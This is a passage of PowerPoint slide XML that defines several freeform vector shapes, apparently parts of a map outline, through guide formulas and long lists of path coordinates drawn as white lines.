                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36322" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4641" y="3072"/>
                <a:ext cx="49" cy="16"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 49 w 49"/>
                  <a:gd name="T1" fmla="*/ 5 h 16"/>
                  <a:gd name="T2" fmla="*/ 45 w 49"/>
                  <a:gd name="T3" fmla="*/ 7 h 16"/>
                  <a:gd name="T4" fmla="*/ 45 w 49"/>
                  <a:gd name="T5" fmla="*/ 8 h 16"/>
                  <a:gd name="T6" fmla="*/ 39 w 49"/>
                  <a:gd name="T7" fmla="*/ 11 h 16"/>
                  <a:gd name="T8" fmla="*/ 35 w 49"/>
                  <a:gd name="T9" fmla="*/ 13 h 16"/>
                  <a:gd name="T10" fmla="*/ 32 w 49"/>
                  <a:gd name="T11" fmla="*/ 12 h 16"/>
                  <a:gd name="T12" fmla="*/ 29 w 49"/>
                  <a:gd name="T13" fmla="*/ 15 h 16"/>
                  <a:gd name="T14" fmla="*/ 25 w 49"/>
                  <a:gd name="T15" fmla="*/ 14 h 16"/>
                  <a:gd name="T16" fmla="*/ 22 w 49"/>
                  <a:gd name="T17" fmla="*/ 13 h 16"/>
                  <a:gd name="T18" fmla="*/ 20 w 49"/>
                  <a:gd name="T19" fmla="*/ 15 h 16"/>
                  <a:gd name="T20" fmla="*/ 18 w 49"/>
                  <a:gd name="T21" fmla="*/ 16 h 16"/>
                  <a:gd name="T22" fmla="*/ 15 w 49"/>
                  <a:gd name="T23" fmla="*/ 15 h 16"/>
                  <a:gd name="T24" fmla="*/ 11 w 49"/>
                  <a:gd name="T25" fmla="*/ 14 h 16"/>
                  <a:gd name="T26" fmla="*/ 3 w 49"/>
                  <a:gd name="T27" fmla="*/ 13 h 16"/>
                  <a:gd name="T28" fmla="*/ 1 w 49"/>
                  <a:gd name="T29" fmla="*/ 14 h 16"/>
                  <a:gd name="T30" fmla="*/ 0 w 49"/>
                  <a:gd name="T31" fmla="*/ 10 h 16"/>
                  <a:gd name="T32" fmla="*/ 0 w 49"/>
                  <a:gd name="T33" fmla="*/ 8 h 16"/>
                  <a:gd name="T34" fmla="*/ 3 w 49"/>
                  <a:gd name="T35" fmla="*/ 6 h 16"/>
                  <a:gd name="T36" fmla="*/ 7 w 49"/>
                  <a:gd name="T37" fmla="*/ 5 h 16"/>
                  <a:gd name="T38" fmla="*/ 11 w 49"/>
                  <a:gd name="T39" fmla="*/ 5 h 16"/>
                  <a:gd name="T40" fmla="*/ 19 w 49"/>
                  <a:gd name="T41" fmla="*/ 8 h 16"/>
                  <a:gd name="T42" fmla="*/ 22 w 49"/>
                  <a:gd name="T43" fmla="*/ 10 h 16"/>
                  <a:gd name="T44" fmla="*/ 25 w 49"/>
                  <a:gd name="T45" fmla="*/ 10 h 16"/>
                  <a:gd name="T46" fmla="*/ 27 w 49"/>
                  <a:gd name="T47" fmla="*/ 8 h 16"/>
                  <a:gd name="T48" fmla="*/ 30 w 49"/>
                  <a:gd name="T49" fmla="*/ 8 h 16"/>
                  <a:gd name="T50" fmla="*/ 34 w 49"/>
                  <a:gd name="T51" fmla="*/ 7 h 16"/>
                  <a:gd name="T52" fmla="*/ 36 w 49"/>
                  <a:gd name="T53" fmla="*/ 9 h 16"/>
                  <a:gd name="T54" fmla="*/ 40 w 49"/>
                  <a:gd name="T55" fmla="*/ 8 h 16"/>
                  <a:gd name="T56" fmla="*/ 39 w 49"/>
                  <a:gd name="T57" fmla="*/ 6 h 16"/>
                  <a:gd name="T58" fmla="*/ 42 w 49"/>
                  <a:gd name="T59" fmla="*/ 5 h 16"/>
                  <a:gd name="T60" fmla="*/ 45 w 49"/>
                  <a:gd name="T61" fmla="*/ 3 h 16"/>
                  <a:gd name="T62" fmla="*/ 46 w 49"/>
                  <a:gd name="T63" fmla="*/ 2 h 16"/>
                  <a:gd name="T64" fmla="*/ 45 w 49"/>
                  <a:gd name="T65" fmla="*/ 1 h 16"/>
                  <a:gd name="T66" fmla="*/ 44 w 49"/>
                  <a:gd name="T67" fmla="*/ 2 h 16"/>
                  <a:gd name="T68" fmla="*/ 45 w 49"/>
                  <a:gd name="T69" fmla="*/ 0 h 16"/>
                  <a:gd name="T70" fmla="*/ 46 w 49"/>
                  <a:gd name="T71" fmla="*/ 0 h 16"/>
                  <a:gd name="T72" fmla="*/ 47 w 49"/>
                  <a:gd name="T73" fmla="*/ 1 h 16"/>
                  <a:gd name="T74" fmla="*/ 49 w 49"/>
                  <a:gd name="T75" fmla="*/ 3 h 16"/>
                  <a:gd name="T76" fmla="*/ 49 w 49"/>
                  <a:gd name="T77" fmla="*/ 5 h 1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49"/>
                  <a:gd name="T118" fmla="*/ 0 h 16"/>
                  <a:gd name="T119" fmla="*/ 49 w 49"/>
                  <a:gd name="T120" fmla="*/ 16 h 1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49" h="16">
                    <a:moveTo>
                      <a:pt x="49" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="45" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="5"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36323" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4924" y="3063"/>
                <a:ext cx="19" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 19"/>
                  <a:gd name="T1" fmla="*/ 17 h 17"/>
                  <a:gd name="T2" fmla="*/ 0 w 19"/>
                  <a:gd name="T3" fmla="*/ 15 h 17"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 8 w 19"/>
                  <a:gd name="T7" fmla="*/ 2 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 19"/>
                  <a:gd name="T9" fmla="*/ 1 h 17"/>
                  <a:gd name="T10" fmla="*/ 14 w 19"/>
                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                  <a:gd name="T12" fmla="*/ 18 w 19"/>
                  <a:gd name="T13" fmla="*/ 2 h 17"/>
                  <a:gd name="T14" fmla="*/ 19 w 19"/>
                  <a:gd name="T15" fmla="*/ 4 h 17"/>
                  <a:gd name="T16" fmla="*/ 18 w 19"/>
                  <a:gd name="T17" fmla="*/ 6 h 17"/>
                  <a:gd name="T18" fmla="*/ 16 w 19"/>
                  <a:gd name="T19" fmla="*/ 10 h 17"/>
                  <a:gd name="T20" fmla="*/ 14 w 19"/>
                  <a:gd name="T21" fmla="*/ 11 h 17"/>
                  <a:gd name="T22" fmla="*/ 10 w 19"/>
                  <a:gd name="T23" fmla="*/ 16 h 17"/>
                  <a:gd name="T24" fmla="*/ 8 w 19"/>
                  <a:gd name="T25" fmla="*/ 17 h 1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9"/>
                  <a:gd name="T40" fmla="*/ 0 h 17"/>
                  <a:gd name="T41" fmla="*/ 19 w 19"/>
                  <a:gd name="T42" fmla="*/ 17 h 17"/>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9" h="17">
                    <a:moveTo>
                      <a:pt x="8" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="17"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36324" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4739" y="2995"/>
                <a:ext cx="18" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 18"/>
                  <a:gd name="T1" fmla="*/ 10 h 10"/>
                  <a:gd name="T2" fmla="*/ 7 w 18"/>
                  <a:gd name="T3" fmla="*/ 10 h 10"/>
                  <a:gd name="T4" fmla="*/ 2 w 18"/>
                  <a:gd name="T5" fmla="*/ 6 h 10"/>
                  <a:gd name="T6" fmla="*/ 0 w 18"/>
                  <a:gd name="T7" fmla="*/ 3 h 10"/>
                  <a:gd name="T8" fmla="*/ 1 w 18"/>
                  <a:gd name="T9" fmla="*/ 1 h 10"/>
                  <a:gd name="T10" fmla="*/ 6 w 18"/>
                  <a:gd name="T11" fmla="*/ 0 h 10"/>
                  <a:gd name="T12" fmla="*/ 11 w 18"/>
                  <a:gd name="T13" fmla="*/ 0 h 10"/>
                  <a:gd name="T14" fmla="*/ 13 w 18"/>
                  <a:gd name="T15" fmla="*/ 1 h 10"/>
                  <a:gd name="T16" fmla="*/ 15 w 18"/>
                  <a:gd name="T17" fmla="*/ 3 h 10"/>
                  <a:gd name="T18" fmla="*/ 17 w 18"/>
                  <a:gd name="T19" fmla="*/ 4 h 10"/>
                  <a:gd name="T20" fmla="*/ 18 w 18"/>
                  <a:gd name="T21" fmla="*/ 6 h 10"/>
                  <a:gd name="T22" fmla="*/ 17 w 18"/>
                  <a:gd name="T23" fmla="*/ 8 h 10"/>
                  <a:gd name="T24" fmla="*/ 16 w 18"/>
                  <a:gd name="T25" fmla="*/ 8 h 10"/>
                  <a:gd name="T26" fmla="*/ 10 w 18"/>
                  <a:gd name="T27" fmla="*/ 10 h 1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8"/>
                  <a:gd name="T43" fmla="*/ 0 h 10"/>
                  <a:gd name="T44" fmla="*/ 18 w 18"/>
                  <a:gd name="T45" fmla="*/ 10 h 1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8" h="10">
                    <a:moveTo>
                      <a:pt x="10" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36325" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4771" y="2990"/>
                <a:ext cx="44" cy="15"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 44"/>
                  <a:gd name="T1" fmla="*/ 15 h 15"/>
                  <a:gd name="T2" fmla="*/ 40 w 44"/>
                  <a:gd name="T3" fmla="*/ 15 h 15"/>
                  <a:gd name="T4" fmla="*/ 36 w 44"/>
                  <a:gd name="T5" fmla="*/ 12 h 15"/>
                  <a:gd name="T6" fmla="*/ 29 w 44"/>
                  <a:gd name="T7" fmla="*/ 7 h 15"/>
                  <a:gd name="T8" fmla="*/ 27 w 44"/>
                  <a:gd name="T9" fmla="*/ 6 h 15"/>
                  <a:gd name="T10" fmla="*/ 24 w 44"/>
                  <a:gd name="T11" fmla="*/ 6 h 15"/>
                  <a:gd name="T12" fmla="*/ 24 w 44"/>
                  <a:gd name="T13" fmla="*/ 7 h 15"/>
                  <a:gd name="T14" fmla="*/ 24 w 44"/>
                  <a:gd name="T15" fmla="*/ 10 h 15"/>
                  <a:gd name="T16" fmla="*/ 23 w 44"/>
                  <a:gd name="T17" fmla="*/ 11 h 15"/>
                  <a:gd name="T18" fmla="*/ 15 w 44"/>
                  <a:gd name="T19" fmla="*/ 8 h 15"/>
                  <a:gd name="T20" fmla="*/ 14 w 44"/>
                  <a:gd name="T21" fmla="*/ 5 h 15"/>
                  <a:gd name="T22" fmla="*/ 10 w 44"/>
                  <a:gd name="T23" fmla="*/ 7 h 15"/>
                  <a:gd name="T24" fmla="*/ 7 w 44"/>
                  <a:gd name="T25" fmla="*/ 8 h 15"/>
                  <a:gd name="T26" fmla="*/ 5 w 44"/>
                  <a:gd name="T27" fmla="*/ 10 h 15"/>
                  <a:gd name="T28" fmla="*/ 4 w 44"/>
                  <a:gd name="T29" fmla="*/ 8 h 15"/>
                  <a:gd name="T30" fmla="*/ 2 w 44"/>
                  <a:gd name="T31" fmla="*/ 5 h 15"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 2 h 15"/>
                  <a:gd name="T34" fmla="*/ 2 w 44"/>
                  <a:gd name="T35" fmla="*/ 1 h 15"/>
                  <a:gd name="T36" fmla="*/ 4 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 15"/>
                  <a:gd name="T38" fmla="*/ 6 w 44"/>
                  <a:gd name="T39" fmla="*/ 1 h 15"/>
                  <a:gd name="T40" fmla="*/ 14 w 44"/>
                  <a:gd name="T41" fmla="*/ 1 h 15"/>
                  <a:gd name="T42" fmla="*/ 18 w 44"/>
                  <a:gd name="T43" fmla="*/ 3 h 15"/>
                  <a:gd name="T44" fmla="*/ 20 w 44"/>
                  <a:gd name="T45" fmla="*/ 3 h 15"/>
                  <a:gd name="T46" fmla="*/ 24 w 44"/>
                  <a:gd name="T47" fmla="*/ 1 h 15"/>
                  <a:gd name="T48" fmla="*/ 27 w 44"/>
                  <a:gd name="T49" fmla="*/ 1 h 15"/>
                  <a:gd name="T50" fmla="*/ 31 w 44"/>
                  <a:gd name="T51" fmla="*/ 2 h 15"/>
                  <a:gd name="T52" fmla="*/ 37 w 44"/>
                  <a:gd name="T53" fmla="*/ 3 h 15"/>
                  <a:gd name="T54" fmla="*/ 40 w 44"/>
                  <a:gd name="T55" fmla="*/ 6 h 15"/>
                  <a:gd name="T56" fmla="*/ 42 w 44"/>
                  <a:gd name="T57" fmla="*/ 9 h 15"/>
                  <a:gd name="T58" fmla="*/ 44 w 44"/>
                  <a:gd name="T59" fmla="*/ 13 h 15"/>
                  <a:gd name="T60" fmla="*/ 43 w 44"/>
                  <a:gd name="T61" fmla="*/ 15 h 15"/>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44"/>
                  <a:gd name="T94" fmla="*/ 0 h 15"/>
                  <a:gd name="T95" fmla="*/ 44 w 44"/>
                  <a:gd name="T96" fmla="*/ 15 h 15"/>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44" h="15">
                    <a:moveTo>
                      <a:pt x="43" y="15"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="15"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36326" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4328" y="2834"/>
                <a:ext cx="300" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 300"/>
                  <a:gd name="T1" fmla="*/ 13 h 98"/>
                  <a:gd name="T2" fmla="*/ 51 w 300"/>
                  <a:gd name="T3" fmla="*/ 33 h 98"/>
                  <a:gd name="T4" fmla="*/ 50 w 300"/>
                  <a:gd name="T5" fmla="*/ 49 h 98"/>
                  <a:gd name="T6" fmla="*/ 51 w 300"/>
                  <a:gd name="T7" fmla="*/ 65 h 98"/>
                  <a:gd name="T8" fmla="*/ 58 w 300"/>
                  <a:gd name="T9" fmla="*/ 75 h 98"/>
                  <a:gd name="T10" fmla="*/ 61 w 300"/>
                  <a:gd name="T11" fmla="*/ 87 h 98"/>
                  <a:gd name="T12" fmla="*/ 51 w 300"/>
                  <a:gd name="T13" fmla="*/ 87 h 98"/>
                  <a:gd name="T14" fmla="*/ 37 w 300"/>
                  <a:gd name="T15" fmla="*/ 77 h 98"/>
                  <a:gd name="T16" fmla="*/ 19 w 300"/>
                  <a:gd name="T17" fmla="*/ 66 h 98"/>
                  <a:gd name="T18" fmla="*/ 8 w 300"/>
                  <a:gd name="T19" fmla="*/ 48 h 98"/>
                  <a:gd name="T20" fmla="*/ 7 w 300"/>
                  <a:gd name="T21" fmla="*/ 37 h 98"/>
                  <a:gd name="T22" fmla="*/ 1 w 300"/>
                  <a:gd name="T23" fmla="*/ 17 h 98"/>
                  <a:gd name="T24" fmla="*/ 3 w 300"/>
                  <a:gd name="T25" fmla="*/ 8 h 98"/>
                  <a:gd name="T26" fmla="*/ 12 w 300"/>
                  <a:gd name="T27" fmla="*/ 12 h 98"/>
                  <a:gd name="T28" fmla="*/ 14 w 300"/>
                  <a:gd name="T29" fmla="*/ 17 h 98"/>
                  <a:gd name="T30" fmla="*/ 15 w 300"/>
                  <a:gd name="T31" fmla="*/ 22 h 98"/>
                  <a:gd name="T32" fmla="*/ 21 w 300"/>
                  <a:gd name="T33" fmla="*/ 18 h 98"/>
                  <a:gd name="T34" fmla="*/ 26 w 300"/>
                  <a:gd name="T35" fmla="*/ 17 h 98"/>
                  <a:gd name="T36" fmla="*/ 149 w 300"/>
                  <a:gd name="T37" fmla="*/ 81 h 98"/>
                  <a:gd name="T38" fmla="*/ 155 w 300"/>
                  <a:gd name="T39" fmla="*/ 85 h 98"/>
                  <a:gd name="T40" fmla="*/ 169 w 300"/>
                  <a:gd name="T41" fmla="*/ 90 h 98"/>
                  <a:gd name="T42" fmla="*/ 171 w 300"/>
                  <a:gd name="T43" fmla="*/ 86 h 98"/>
                  <a:gd name="T44" fmla="*/ 178 w 300"/>
                  <a:gd name="T45" fmla="*/ 68 h 98"/>
                  <a:gd name="T46" fmla="*/ 200 w 300"/>
                  <a:gd name="T47" fmla="*/ 62 h 98"/>
                  <a:gd name="T48" fmla="*/ 211 w 300"/>
                  <a:gd name="T49" fmla="*/ 50 h 98"/>
                  <a:gd name="T50" fmla="*/ 220 w 300"/>
                  <a:gd name="T51" fmla="*/ 39 h 98"/>
                  <a:gd name="T52" fmla="*/ 222 w 300"/>
                  <a:gd name="T53" fmla="*/ 43 h 98"/>
                  <a:gd name="T54" fmla="*/ 227 w 300"/>
                  <a:gd name="T55" fmla="*/ 46 h 98"/>
                  <a:gd name="T56" fmla="*/ 238 w 300"/>
                  <a:gd name="T57" fmla="*/ 41 h 98"/>
                  <a:gd name="T58" fmla="*/ 237 w 300"/>
                  <a:gd name="T59" fmla="*/ 37 h 98"/>
                  <a:gd name="T60" fmla="*/ 236 w 300"/>
                  <a:gd name="T61" fmla="*/ 32 h 98"/>
                  <a:gd name="T62" fmla="*/ 241 w 300"/>
                  <a:gd name="T63" fmla="*/ 32 h 98"/>
                  <a:gd name="T64" fmla="*/ 239 w 300"/>
                  <a:gd name="T65" fmla="*/ 26 h 98"/>
                  <a:gd name="T66" fmla="*/ 247 w 300"/>
                  <a:gd name="T67" fmla="*/ 23 h 98"/>
                  <a:gd name="T68" fmla="*/ 253 w 300"/>
                  <a:gd name="T69" fmla="*/ 13 h 98"/>
                  <a:gd name="T70" fmla="*/ 261 w 300"/>
                  <a:gd name="T71" fmla="*/ 0 h 98"/>
                  <a:gd name="T72" fmla="*/ 268 w 300"/>
                  <a:gd name="T73" fmla="*/ 1 h 98"/>
                  <a:gd name="T74" fmla="*/ 276 w 300"/>
                  <a:gd name="T75" fmla="*/ 8 h 98"/>
                  <a:gd name="T76" fmla="*/ 273 w 300"/>
                  <a:gd name="T77" fmla="*/ 16 h 98"/>
                  <a:gd name="T78" fmla="*/ 281 w 300"/>
                  <a:gd name="T79" fmla="*/ 16 h 98"/>
                  <a:gd name="T80" fmla="*/ 285 w 300"/>
                  <a:gd name="T81" fmla="*/ 20 h 98"/>
                  <a:gd name="T82" fmla="*/ 297 w 300"/>
                  <a:gd name="T83" fmla="*/ 25 h 98"/>
                  <a:gd name="T84" fmla="*/ 299 w 300"/>
                  <a:gd name="T85" fmla="*/ 30 h 98"/>
                  <a:gd name="T86" fmla="*/ 290 w 300"/>
